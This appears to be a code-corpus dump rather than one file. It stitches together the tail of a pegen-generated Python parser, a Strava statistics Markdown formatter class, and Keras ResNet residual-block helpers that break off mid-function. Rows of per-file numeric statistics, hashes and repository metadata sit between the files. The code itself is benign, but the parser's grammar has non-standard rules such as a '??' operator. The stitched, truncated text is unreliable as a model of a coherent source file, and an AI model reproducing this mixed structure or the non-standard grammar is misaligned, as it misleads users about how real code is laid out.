):
return list
self._reset(mark)
if (
(tuple := self.tuple())
):
return tuple
self._reset(mark)
if (
(genexp := self.genexp())
):
return genexp
self._reset(mark)
if (
(literal := self.expect('True'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('None'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('False'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_166(self) -> Optional[Any]:
# _tmp_166: '=' | ':='
mark = self._mark()
if (
(literal := self.expect('='))
):
return literal
self._reset(mark)
if (
(literal := self.expect(':='))
):
return literal
self._reset(mark)
return None
@memoize
def _loop0_167(self) -> Optional[Any]:
# _loop0_167: star_named_expressions
mark = self._mark()
children = []
while (
(star_named_expressions := self.star_named_expressions())
):
children.append(star_named_expressions)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_168(self) -> Optional[Any]:
# _loop0_168: (star_targets '=')
mark = self._mark()
children = []
while (
(_tmp_213 := self._tmp_213())
):
children.append(_tmp_213)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_169(self) -> Optional[Any]:
# _loop0_169: (star_targets '=')
mark = self._mark()
children = []
while (
(_tmp_214 := self._tmp_214())
):
children.append(_tmp_214)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_170(self) -> Optional[Any]:
# _tmp_170: yield_expr | star_expressions
mark = self._mark()
if (
(yield_expr := self.yield_expr())
):
return yield_expr
self._reset(mark)
if (
(star_expressions := self.star_expressions())
):
return star_expressions
self._reset(mark)
return None
@memoize
def _tmp_171(self) -> Optional[Any]:
# _tmp_171: '[' | '(' | '{'
mark = self._mark()
if (
(literal := self.expect('['))
):
return literal
self._reset(mark)
if (
(literal := self.expect('('))
):
return literal
self._reset(mark)
if (
(literal := self.expect('{'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_172(self) -> Optional[Any]:
# _tmp_172: '[' | '{'
mark = self._mark()
if (
(literal := self.expect('['))
):
return literal
self._reset(mark)
if (
(literal := self.expect('{'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_173(self) -> Optional[Any]:
# _tmp_173: '[' | '{'
mark = self._mark()
if (
(literal := self.expect('['))
):
return literal
self._reset(mark)
if (
(literal := self.expect('{'))
):
return literal
self._reset(mark)
return None
@memoize
def _loop0_174(self) -> Optional[Any]:
# _loop0_174: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_175(self) -> Optional[Any]:
# _loop1_175: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_176(self) -> Optional[Any]:
# _loop0_176: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_177(self) -> Optional[Any]:
# _loop1_177: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_178(self) -> Optional[Any]:
# _tmp_178: ')' | ',' (')' | '**')
mark = self._mark()
if (
(literal := self.expect(')'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(','))
and
(_tmp_215 := self._tmp_215())
):
return [literal, _tmp_215]
self._reset(mark)
return None
@memoize
def _tmp_179(self) -> Optional[Any]:
# _tmp_179: ':' | ',' (':' | '**')
mark = self._mark()
if (
(literal := self.expect(':'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(','))
and
(_tmp_216 := self._tmp_216())
):
return [literal, _tmp_216]
self._reset(mark)
return None
@memoize
def _tmp_180(self) -> Optional[Any]:
# _tmp_180: ',' | ')' | ':'
mark = self._mark()
if (
(literal := self.expect(','))
):
return literal
self._reset(mark)
if (
(literal := self.expect(')'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(':'))
):
return literal
self._reset(mark)
return None
@memoize
def _loop0_182(self) -> Optional[Any]:
# _loop0_182: ',' (expression ['as' star_target])
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self._tmp_217())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_181(self) -> Optional[Any]:
# _gather_181: (expression ['as' star_target]) _loop0_182
mark = self._mark()
if (
(elem := self._tmp_217())
is not None
and
(seq := self._loop0_182())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_184(self) -> Optional[Any]:
# _loop0_184: ',' (expressions ['as' star_target])
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self._tmp_218())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_183(self) -> Optional[Any]:
# _gather_183: (expressions ['as' star_target]) _loop0_184
mark = self._mark()
if (
(elem := self._tmp_218())
is not None
and
(seq := self._loop0_184())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_186(self) -> Optional[Any]:
# _loop0_186: ',' (expression ['as' star_target])
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self._tmp_219())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_185(self) -> Optional[Any]:
# _gather_185: (expression ['as' star_target]) _loop0_186
mark = self._mark()
if (
(elem := self._tmp_219())
is not None
and
(seq := self._loop0_186())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_188(self) -> Optional[Any]:
# _loop0_188: ',' (expressions ['as' star_target])
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self._tmp_220())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_187(self) -> Optional[Any]:
# _gather_187: (expressions ['as' star_target]) _loop0_188
mark = self._mark()
if (
(elem := self._tmp_220())
is not None
and
(seq := self._loop0_188())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_189(self) -> Optional[Any]:
# _tmp_189: 'except' | 'finally'
mark = self._mark()
if (
(literal := self.expect('except'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('finally'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_190(self) -> Optional[Any]:
# _tmp_190: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(name := self.name())
):
return [literal, name]
self._reset(mark)
return None
@memoize
def _tmp_191(self) -> Optional[Any]:
# _tmp_191: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(name := self.name())
):
return [literal, name]
self._reset(mark)
return None
@memoize
def _tmp_192(self) -> Optional[Any]:
# _tmp_192: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(name := self.name())
):
return [literal, name]
self._reset(mark)
return None
@memoize
def _tmp_193(self) -> Optional[Any]:
# _tmp_193: positional_patterns ','
mark = self._mark()
if (
(positional_patterns := self.positional_patterns())
and
(literal := self.expect(','))
):
return [positional_patterns, literal]
self._reset(mark)
return None
@memoize
def _tmp_194(self) -> Optional[Any]:
# _tmp_194: '->' expression
mark = self._mark()
if (
(literal := self.expect('->'))
and
(expression := self.expression())
):
return [literal, expression]
self._reset(mark)
return None
@memoize
def _tmp_195(self) -> Optional[Any]:
# _tmp_195: '(' arguments? ')'
mark = self._mark()
if (
(literal := self.expect('('))
and
(opt := self.arguments(),)
and
(literal_1 := self.expect(')'))
):
return [literal, opt, literal_1]
self._reset(mark)
return None
@memoize
def _loop0_197(self) -> Optional[Any]:
# _loop0_197: ',' double_starred_kvpair
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.double_starred_kvpair())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_196(self) -> Optional[Any]:
# _gather_196: double_starred_kvpair _loop0_197
mark = self._mark()
if (
(elem := self.double_starred_kvpair())
is not None
and
(seq := self._loop0_197())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_198(self) -> Optional[Any]:
# _tmp_198: '}' | ','
mark = self._mark()
if (
(literal := self.expect('}'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(','))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_199(self) -> Optional[Any]:
# _tmp_199: star_targets '='
mark = self._mark()
if (
(z := self.star_targets())
and
(literal := self.expect('='))
):
return z
self._reset(mark)
return None
@memoize
def _tmp_200(self) -> Optional[Any]:
# _tmp_200: '.' | '...'
mark = self._mark()
if (
(literal := self.expect('.'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('...'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_201(self) -> Optional[Any]:
# _tmp_201: '.' | '...'
mark = self._mark()
if (
(literal := self.expect('.'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('...'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_202(self) -> Optional[Any]:
# _tmp_202: ',' expression
mark = self._mark()
if (
(literal := self.expect(','))
and
(c := self.expression())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_203(self) -> Optional[Any]:
# _tmp_203: ',' star_expression
mark = self._mark()
if (
(literal := self.expect(','))
and
(c := self.star_expression())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_204(self) -> Optional[Any]:
# _tmp_204: 'or' conjunction
mark = self._mark()
if (
(literal := self.expect('or'))
and
(c := self.conjunction())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_205(self) -> Optional[Any]:
# _tmp_205: '??' conjunction
mark = self._mark()
if (
(literal := self.expect('??'))
and
(c := self.conjunction())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_206(self) -> Optional[Any]:
# _tmp_206: 'and' inversion
mark = self._mark()
if (
(literal := self.expect('and'))
and
(c := self.inversion())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_207(self) -> Optional[Any]:
# _tmp_207: 'if' disjunction
mark = self._mark()
if (
(literal := self.expect('if'))
and
(z := self.disjunction())
):
return z
self._reset(mark)
return None
@memoize
def _tmp_208(self) -> Optional[Any]:
# _tmp_208: 'if' disjunction
mark = self._mark()
if (
(literal := self.expect('if'))
and
(z := self.disjunction())
):
return z
self._reset(mark)
return None
@memoize
def _tmp_209(self) -> Optional[Any]:
# _tmp_209: starred_expression | (assignment_expression | expression !':=') !'='
mark = self._mark()
if (
(starred_expression := self.starred_expression())
):
return starred_expression
self._reset(mark)
if (
(_tmp_221 := self._tmp_221())
and
self.negative_lookahead(self.expect, '=')
):
return _tmp_221
self._reset(mark)
return None
@memoize
def _tmp_210(self) -> Optional[Any]:
# _tmp_210: partial_placeholder | partial_starred_expression | (assignment_expression | expression !':=') !'='
mark = self._mark()
if (
(partial_placeholder := self.partial_placeholder())
):
return partial_placeholder
self._reset(mark)
if (
(partial_starred_expression := self.partial_starred_expression())
):
return partial_starred_expression
self._reset(mark)
if (
(_tmp_222 := self._tmp_222())
and
self.negative_lookahead(self.expect, '=')
):
return _tmp_222
self._reset(mark)
return None
@memoize
def _tmp_211(self) -> Optional[Any]:
# _tmp_211: ',' star_target
mark = self._mark()
if (
(literal := self.expect(','))
and
(c := self.star_target())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_212(self) -> Optional[Any]:
# _tmp_212: ',' star_target
mark = self._mark()
if (
(literal := self.expect(','))
and
(c := self.star_target())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_213(self) -> Optional[Any]:
# _tmp_213: star_targets '='
mark = self._mark()
if (
(star_targets := self.star_targets())
and
(literal := self.expect('='))
):
return [star_targets, literal]
self._reset(mark)
return None
@memoize
def _tmp_214(self) -> Optional[Any]:
# _tmp_214: star_targets '='
mark = self._mark()
if (
(star_targets := self.star_targets())
and
(literal := self.expect('='))
):
return [star_targets, literal]
self._reset(mark)
return None
@memoize
def _tmp_215(self) -> Optional[Any]:
# _tmp_215: ')' | '**'
mark = self._mark()
if (
(literal := self.expect(')'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('**'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_216(self) -> Optional[Any]:
# _tmp_216: ':' | '**'
mark = self._mark()
if (
(literal := self.expect(':'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('**'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_217(self) -> Optional[Any]:
# _tmp_217: expression ['as' star_target]
mark = self._mark()
if (
(expression := self.expression())
and
(opt := self._tmp_223(),)
):
return [expression, opt]
self._reset(mark)
return None
@memoize
def _tmp_218(self) -> Optional[Any]:
# _tmp_218: expressions ['as' star_target]
mark = self._mark()
if (
(expressions := self.expressions())
and
(opt := self._tmp_224(),)
):
return [expressions, opt]
self._reset(mark)
return None
@memoize
def _tmp_219(self) -> Optional[Any]:
# _tmp_219: expression ['as' star_target]
mark = self._mark()
if (
(expression := self.expression())
and
(opt := self._tmp_225(),)
):
return [expression, opt]
self._reset(mark)
return None
@memoize
def _tmp_220(self) -> Optional[Any]:
# _tmp_220: expressions ['as' star_target]
mark = self._mark()
if (
(expressions := self.expressions())
and
(opt := self._tmp_226(),)
):
return [expressions, opt]
self._reset(mark)
return None
@memoize
def _tmp_221(self) -> Optional[Any]:
# _tmp_221: assignment_expression | expression !':='
mark = self._mark()
if (
(assignment_expression := self.assignment_expression())
):
return assignment_expression
self._reset(mark)
if (
(expression := self.expression())
and
self.negative_lookahead(self.expect, ':=')
):
return expression
self._reset(mark)
return None
@memoize
def _tmp_222(self) -> Optional[Any]:
# _tmp_222: assignment_expression | expression !':='
mark = self._mark()
if (
(assignment_expression := self.assignment_expression())
):
return assignment_expression
self._reset(mark)
if (
(expression := self.expression())
and
self.negative_lookahead(self.expect, ':=')
):
return expression
self._reset(mark)
return None
@memoize
def _tmp_223(self) -> Optional[Any]:
# _tmp_223: 'as' star_target
mark = self._mark()
if (
(literal := self.expect('as'))
and
(star_target := self.star_target())
):
return [literal, star_target]
self._reset(mark)
return None
@memoize
def _tmp_224(self) -> Optional[Any]:
# _tmp_224: 'as' star_target
mark = self._mark()
if (
(literal := self.expect('as'))
and
(star_target := self.star_target())
):
return [literal, star_target]
self._reset(mark)
return None
@memoize
def _tmp_225(self) -> Optional[Any]:
# _tmp_225: 'as' star_target
mark = self._mark()
if (
(literal := self.expect('as'))
and
(star_target := self.star_target())
):
return [literal, star_target]
self._reset(mark)
return None
@memoize
def _tmp_226(self) -> Optional[Any]:
# _tmp_226: 'as' star_target
mark = self._mark()
if (
(literal := self.expect('as'))
and
(star_target := self.star_target())
):
return [literal, star_target]
self._reset(mark)
return None
# Hard keywords of the grammar, emitted by pegen from the grammar file.
KEYWORDS = ('False', 'None', 'True', 'and', 'as', 'assert', 'async', 'await', 'break', 'class', 'continue', 'def', 'del', 'elif', 'else', 'except', 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is', 'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise', 'return', 'try', 'while', 'with', 'yield')
# Soft keywords are reserved only in specific contexts (e.g. match statements).
SOFT_KEYWORDS = ('_', 'case', 'match')

# Allow exercising the generated parser directly from the command line via
# pegen's standard driver.
if __name__ == '__main__':
    from pegen.parser import simple_parser_main
    simple_parser_main(PythonParser)
| 33.209377
| 689
| 0.521984
| 35,840
| 339,267
| 4.646401
| 0.021456
| 0.056531
| 0.064638
| 0.052256
| 0.81914
| 0.781735
| 0.750041
| 0.719517
| 0.678923
| 0.64383
| 0
| 0.012266
| 0.359354
| 339,267
| 10,215
| 690
| 33.212628
| 0.753904
| 0.085184
| 0
| 0.814871
| 1
| 0
| 0.021064
| 0.000801
| 0
| 0
| 0
| 0
| 0.00087
| 1
| 0.053267
| false
| 0.000435
| 0.004892
| 0.000326
| 0.190673
| 0.000109
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a5bce3bf5e74ac08979e9e4ea5aba2e15e03fd7
| 9,944
|
py
|
Python
|
scripts/commands/stats/format.py
|
AirP0WeR/strava-telegram-bot
|
3fab6fbce1c94d45b77a957879bdaba86577fd2c
|
[
"MIT"
] | null | null | null |
scripts/commands/stats/format.py
|
AirP0WeR/strava-telegram-bot
|
3fab6fbce1c94d45b77a957879bdaba86577fd2c
|
[
"MIT"
] | null | null | null |
scripts/commands/stats/format.py
|
AirP0WeR/strava-telegram-bot
|
3fab6fbce1c94d45b77a957879bdaba86577fd2c
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
from common.operations import Operations
class FormatStats:
    """Format pre-calculated Strava statistics into Markdown messages.

    ``calculated_stats`` is a flat dict keyed ``'<activity>_<period>_<field>'``
    (e.g. ``'ride_month_distance'``) plus ``'updated'`` and ``'athlete_name'``.
    Distance fields are in meters and time fields in seconds; they are
    converted for display through ``Operations``.
    """

    # Returned by every formatter when the requested period holds no activities.
    NO_ACTIVITY_MESSAGE = "No activities found during this period."

    def __init__(self, calculated_stats):
        self.calculated_stats = calculated_stats
        self.operations = Operations()

    def _stat(self, activity, stats_type_key, field):
        """Look up one ``'<activity>_<period>_<field>'`` value from the stats dict."""
        return self.calculated_stats['{}_{}_{}'.format(activity, stats_type_key, field)]

    def _header(self, activity_label, stats_type):
        """Common ``*<Activity> - <Period>:*`` header with athlete name and timestamp."""
        return "*{activity} - {stats_type}:* _({name}'s stats as on {stats_updated} UTC)_\n\n".format(
            activity=activity_label, stats_type=stats_type,
            stats_updated=self.calculated_stats['updated'],
            name=self.calculated_stats['athlete_name'])

    def ride_stats(self, stats_type, stats_type_key):
        """Return the Markdown ride summary for the given period.

        stats_type: human-readable period label (e.g. 'Month').
        stats_type_key: dict-key fragment for the period (e.g. 'month').
        """
        def stat(field):
            return self._stat('ride', stats_type_key, field)

        ride_stats = self._header('Ride', stats_type)
        if stat('total') <= 0:
            return self.NO_ACTIVITY_MESSAGE
        ride_stats += "- _Rides_: {total} ".format(total=stat('total'))
        if stat('indoor_total') > 0:
            ride_stats += "(Includes {total_indoor} Indoors)\n".format(total_indoor=stat('indoor_total'))
        else:
            ride_stats += "\n"
        ride_stats += "- _Distance_: {distance} km ".format(
            distance=self.operations.meters_to_kilometers(stat('distance')))
        if stat('indoor_distance') > 0:
            ride_stats += "(Includes {indoor_distance} km of Indoors)\n".format(
                indoor_distance=self.operations.meters_to_kilometers(stat('indoor_distance')))
        else:
            ride_stats += "\n"
        ride_stats += "- _Moving Time_: {moving_time} hours ".format(
            moving_time=self.operations.seconds_to_human_readable(stat('moving_time')))
        if stat('indoor_moving_time') > 0:
            ride_stats += "(Includes {indoor_moving_time} hours of Indoors)\n".format(
                indoor_moving_time=self.operations.seconds_to_human_readable(stat('indoor_moving_time')))
        else:
            ride_stats += "\n"
        ride_stats += "- _Elevation Gain_: {elevation_gain} km\n".format(
            elevation_gain=self.operations.meters_to_kilometers(stat('elevation_gain')))
        ride_stats += "- _Biggest Ride_: {biggest_ride} km\n".format(
            biggest_ride=self.operations.meters_to_kilometers(stat('biggest_ride')))
        # Milestone counters, shown only when non-zero.
        if stat('fifty') > 0:
            ride_stats += "- _50's_: {fifties}\n".format(fifties=stat('fifty'))
        if stat('hundred') > 0:
            ride_stats += "- _100's_: {hundreds}".format(hundreds=stat('hundred'))
        return ride_stats

    def run_stats(self, stats_type, stats_type_key):
        """Return the Markdown run summary for the given period (see ride_stats)."""
        def stat(field):
            return self._stat('run', stats_type_key, field)

        run_stats = self._header('Run', stats_type)
        if stat('total') <= 0:
            return self.NO_ACTIVITY_MESSAGE
        run_stats += "- _Runs_: {total} ".format(total=stat('total'))
        if stat('indoor_total') > 0:
            run_stats += "(Includes {total_indoor} Indoors)\n".format(total_indoor=stat('indoor_total'))
        else:
            run_stats += "\n"
        run_stats += "- _Distance_: {distance} km ".format(
            distance=self.operations.meters_to_kilometers(stat('distance')))
        if stat('indoor_distance') > 0:
            run_stats += "(Includes {indoor_distance} km of Indoors)\n".format(
                indoor_distance=self.operations.meters_to_kilometers(stat('indoor_distance')))
        else:
            run_stats += "\n"
        run_stats += "- _Moving Time_: {moving_time} hours ".format(
            moving_time=self.operations.seconds_to_human_readable(stat('moving_time')))
        if stat('indoor_moving_time') > 0:
            run_stats += "(Includes {indoor_moving_time} hours of Indoors)\n".format(
                indoor_moving_time=self.operations.seconds_to_human_readable(stat('indoor_moving_time')))
        else:
            run_stats += "\n"
        run_stats += "- _Elevation Gain_: {elevation_gain} km\n".format(
            elevation_gain=self.operations.meters_to_kilometers(stat('elevation_gain')))
        run_stats += "- _Biggest Run_: {biggest_run} km\n".format(
            biggest_run=self.operations.meters_to_kilometers(stat('biggest_run')))
        # Milestone counters, shown only when non-zero.
        if stat('five') > 0:
            run_stats += "- _5's_: {five}\n".format(five=stat('five'))
        if stat('ten') > 0:
            run_stats += "- _10's_: {ten}\n".format(ten=stat('ten'))
        if stat('hm') > 0:
            run_stats += "- _HM's_: {hm}\n".format(hm=stat('hm'))
        if stat('fm') > 0:
            run_stats += "- _FM's_: {fm}\n".format(fm=stat('fm'))
        if stat('ultra') > 0:
            run_stats += "- _Ultra's_: {ultra}".format(ultra=stat('ultra'))
        return run_stats

    def swim_stats(self, stats_type, stats_type_key):
        """Return the Markdown swim summary for the given period (see ride_stats)."""
        def stat(field):
            return self._stat('swim', stats_type_key, field)

        swim_stats = self._header('Swim', stats_type)
        if stat('total') <= 0:
            return self.NO_ACTIVITY_MESSAGE
        swim_stats += "- _Swims_: {total}\n".format(total=stat('total'))
        swim_stats += "- _Distance_: {distance} km\n".format(
            distance=self.operations.meters_to_kilometers(stat('distance')))
        swim_stats += "- _Moving Time_: {moving_time} hours\n".format(
            moving_time=self.operations.seconds_to_human_readable(stat('moving_time')))
        swim_stats += "- _Biggest Swim_: {biggest_swim} km\n".format(
            biggest_swim=self.operations.meters_to_kilometers(stat('biggest_swim')))
        # Per-distance counters, shown only when non-zero.
        if stat('50') > 0:
            swim_stats += "- _50 m_: {fifty}\n".format(fifty=stat('50'))
        if stat('100') > 0:
            swim_stats += "- _100 m_: {hundred}\n".format(hundred=stat('100'))
        if stat('200') > 0:
            swim_stats += "- _200 m_: {two_hundred}\n".format(two_hundred=stat('200'))
        if stat('400') > 0:
            swim_stats += "- _400 m_: {four_hundred}\n".format(four_hundred=stat('400'))
        if stat('800') > 0:
            swim_stats += "- _800 m_: {eight_hundred}\n".format(eight_hundred=stat('800'))
        if stat('1500') > 0:
            swim_stats += "- _1500+ m_: {thousand_five_hundred}".format(thousand_five_hundred=stat('1500'))
        return swim_stats
| 63.74359
| 120
| 0.625402
| 1,178
| 9,944
| 4.825976
| 0.06961
| 0.11715
| 0.210554
| 0.174142
| 0.869305
| 0.851539
| 0.817766
| 0.77555
| 0.747405
| 0.462797
| 0
| 0.011315
| 0.24457
| 9,944
| 155
| 121
| 64.154839
| 0.745474
| 0.002313
| 0
| 0.253623
| 0
| 0.021739
| 0.226961
| 0.026013
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.007246
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a693d0ca5714d4b4fabc1c8e2fa947e7fb069e9
| 7,977
|
py
|
Python
|
utils/resnet_helpers.py
|
guoyk1990/Keras-FCN
|
75a6d8a7ceb7618c3dd03e5cc9c3ceed181e1652
|
[
"MIT"
] | 733
|
2016-11-09T16:42:46.000Z
|
2022-02-25T06:21:10.000Z
|
utils/resnet_helpers.py
|
guoyk1990/Keras-FCN
|
75a6d8a7ceb7618c3dd03e5cc9c3ceed181e1652
|
[
"MIT"
] | 80
|
2016-12-15T09:12:25.000Z
|
2021-11-17T11:26:21.000Z
|
utils/resnet_helpers.py
|
guoyk1990/Keras-FCN
|
75a6d8a7ceb7618c3dd03e5cc9c3ceed181e1652
|
[
"MIT"
] | 349
|
2016-10-21T01:36:56.000Z
|
2021-12-06T00:40:19.000Z
|
from keras.layers import *
from keras.layers.merge import Add
from keras.regularizers import l2
# The original help functions from keras does not have weight regularizers, so I modified them.
# Also, I changed these two functions into functional style
def identity_block(kernel_size, filters, stage, block, weight_decay=0., batch_momentum=0.99):
    '''The identity_block is the block that has no conv layer at shortcut
    # Arguments
        kernel_size: default 3, the kernel size of middle conv layer at main path
        filters: list of integers, the nb_filters of 3 conv layer at main path
        stage: integer, current stage label, used for generating layer names
        block: 'a','b'..., current block label, used for generating layer names
        weight_decay: l2 regularization factor applied to every conv kernel
        batch_momentum: momentum passed to each BatchNormalization layer

    # Returns
        A closure ``f(input_tensor) -> tensor`` that builds the residual block
        when applied to a Keras tensor (functional style).
    '''
    def f(input_tensor):
        nb_filter1, nb_filter2, nb_filter3 = filters
        # Batch-norm axis depends on the backend image format (channels last vs first).
        if K.image_data_format() == 'channels_last':
            bn_axis = 3
        else:
            bn_axis = 1
        conv_name_base = 'res' + str(stage) + block + '_branch'
        bn_name_base = 'bn' + str(stage) + block + '_branch'
        # Main path: 1x1 -> kxk (same padding) -> 1x1 bottleneck.
        x = Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)
        x = Activation('relu')(x)
        x = Conv2D(nb_filter2, (kernel_size, kernel_size),
                   padding='same', name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)
        x = Activation('relu')(x)
        x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)
        # Identity shortcut: add the unmodified input back onto the main path.
        x = Add()([x, input_tensor])
        x = Activation('relu')(x)
        return x
    return f
def conv_block(kernel_size, filters, stage, block, weight_decay=0., strides=(2, 2), batch_momentum=0.99):
    '''conv_block is the block that has a conv layer at shortcut
    # Arguments
        kernel_size: default 3, the kernel size of middle conv layer at main path
        filters: list of integers, the nb_filters of 3 conv layer at main path
        stage: integer, current stage label, used for generating layer names
        block: 'a','b'..., current block label, used for generating layer names
        weight_decay: l2 regularization factor applied to every conv kernel
        strides: strides of the first main-path conv AND of the shortcut conv
        batch_momentum: momentum passed to each BatchNormalization layer
    Note that from stage 3, the first conv layer at main path is with strides=(2,2)
    And the shortcut should have strides=(2,2) as well

    # Returns
        A closure ``f(input_tensor) -> tensor`` that builds the residual block.
    '''
    def f(input_tensor):
        nb_filter1, nb_filter2, nb_filter3 = filters
        # Batch-norm axis depends on the backend image format (channels last vs first).
        if K.image_data_format() == 'channels_last':
            bn_axis = 3
        else:
            bn_axis = 1
        conv_name_base = 'res' + str(stage) + block + '_branch'
        bn_name_base = 'bn' + str(stage) + block + '_branch'
        # Main path: strided 1x1 -> kxk (same padding) -> 1x1 bottleneck.
        x = Conv2D(nb_filter1, (1, 1), strides=strides,
                   name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)
        x = Activation('relu')(x)
        x = Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
                   name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)
        x = Activation('relu')(x)
        x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)
        # Projection shortcut: strided 1x1 conv matches the main path's shape.
        shortcut = Conv2D(nb_filter3, (1, 1), strides=strides,
                          name=conv_name_base + '1', kernel_regularizer=l2(weight_decay))(input_tensor)
        shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1', momentum=batch_momentum)(shortcut)
        x = Add()([x, shortcut])
        x = Activation('relu')(x)
        return x
    return f
# Atrous-Convolution version of residual blocks
def atrous_identity_block(kernel_size, filters, stage, block, weight_decay=0., atrous_rate=(2, 2), batch_momentum=0.99):
    '''The identity_block is the block that has no conv layer at shortcut
    # Arguments
        kernel_size: default 3, the kernel size of middle conv layer at main path
        filters: list of integers, the nb_filters of 3 conv layer at main path
        stage: integer, current stage label, used for generating layer names
        block: 'a','b'..., current block label, used for generating layer names
        weight_decay: l2 regularization factor applied to every conv kernel
        atrous_rate: dilation rate of the middle (kxk) conv layer
        batch_momentum: momentum passed to each BatchNormalization layer

    # Returns
        A closure ``f(input_tensor) -> tensor`` that builds the residual block.
    '''
    def f(input_tensor):
        nb_filter1, nb_filter2, nb_filter3 = filters
        # Batch-norm axis depends on the backend image format (channels last vs first).
        if K.image_data_format() == 'channels_last':
            bn_axis = 3
        else:
            bn_axis = 1
        conv_name_base = 'res' + str(stage) + block + '_branch'
        bn_name_base = 'bn' + str(stage) + block + '_branch'
        # Main path: 1x1 -> dilated kxk (same padding) -> 1x1 bottleneck.
        x = Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)
        x = Activation('relu')(x)
